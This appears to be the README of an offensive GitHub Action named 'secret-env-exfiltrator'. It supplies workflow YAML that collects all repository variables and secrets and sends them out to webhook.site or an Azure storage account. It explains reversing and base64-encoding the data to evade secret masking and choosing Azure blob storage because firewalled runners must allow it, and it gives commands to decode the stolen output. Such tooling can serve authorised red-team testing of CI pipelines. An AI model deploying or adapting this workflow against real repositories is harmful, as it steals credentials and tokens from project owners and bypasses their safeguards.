on: push
jobs:
exfil:
runs-on: ubuntu-latest
name: This will exfil secrets
steps:
- uses: offensive-actions/secret-env-exfiltrator@main
with:
vars: ${{ toJSON(vars) }}
secrets: ${{ toJSON(secrets) }}on: push
jobs:
exfil:
runs-on: ubuntu-latest
name: This will exfil secrets
steps:
- uses: offensive-actions/secret-env-exfiltrator@main
with:
vars: ${{ toJSON(vars) }}
secrets: ${{ toJSON(secrets) }}
sink: 'webhook.site'
webhook-site-id: '<site_id>'This allows sending the data off to https://webhook.site.
Going there will automatically generate an ID you can use for the input variable webhook-site-id.
⚠️ Beware: if you do not use the paid version of the service, the exfiltrated data will be readable for anyone with the correct ID (UUID), and for the owner of the site.
on: push
jobs:
exfil:
runs-on: ubuntu-latest
name: This will exfil secrets
steps:
- uses: offensive-actions/secret-env-exfiltrator@main
with:
vars: ${{ toJSON(vars) }}
secrets: ${{ toJSON(secrets) }}
sink: 'azure-storage-account'
az-storage-account-name: '<storage_account_name>'
az-storage-container-name: '<container_name>'
az-storage-sas-token: '<sas_token>'This option is available, since *.blob.core.windows.net has to be whitelisted even for firewall protected self-hosted runners, since GitHub uses Azure Storage Accounts for writing job summaries, logs, workflow artifacts, and caches (see documentation).
If your Storage Account has the globally unique name examplename, it will be available at https://examplename.blob.core.windows.net...
You should generate an SAS token that will allow for write-only for a limited time. This will generate one that is valid for 10 minutes:
az storage container generate-sas --account-name <storage_account_name> --name <container_name> --permissions w --expiry $(date -u -d "+10 minutes" +"%Y-%m-%dT%H:%M:%SZ")The Action will exfiltrate a json that is first reversed character by character (to circumvent the masking of secrets) and then base64 encoded for the transport.
Follow these steps to make this blob readable:
# make all of it readable
echo <output> | base64 -d | rev | jq
# show only the envvars that get a special treatment, since they are not in json format to begin with
echo <output> | base64 -d | rev | jq -r '.[0].envvars' | base64 -dAll the contexts: https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/accessing-contextual-information-about-workflow-runs Printing context to logs: https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/accessing-contextual-information-about-workflow-runs#about-contexts
Status:
- logs works on all OSs
- Azure storage works only on ubuntu; on windows there are "too many arguements for curl" and on macos there is a weird problem with awk - however, it worked for logs sink, so I dont get it.
- If exfil fails to webhook or Azure, the action still succeeds, since the HTTP errors are not regarded as errors in general. Change that?
- Fix Azure exfil for windows and macOS
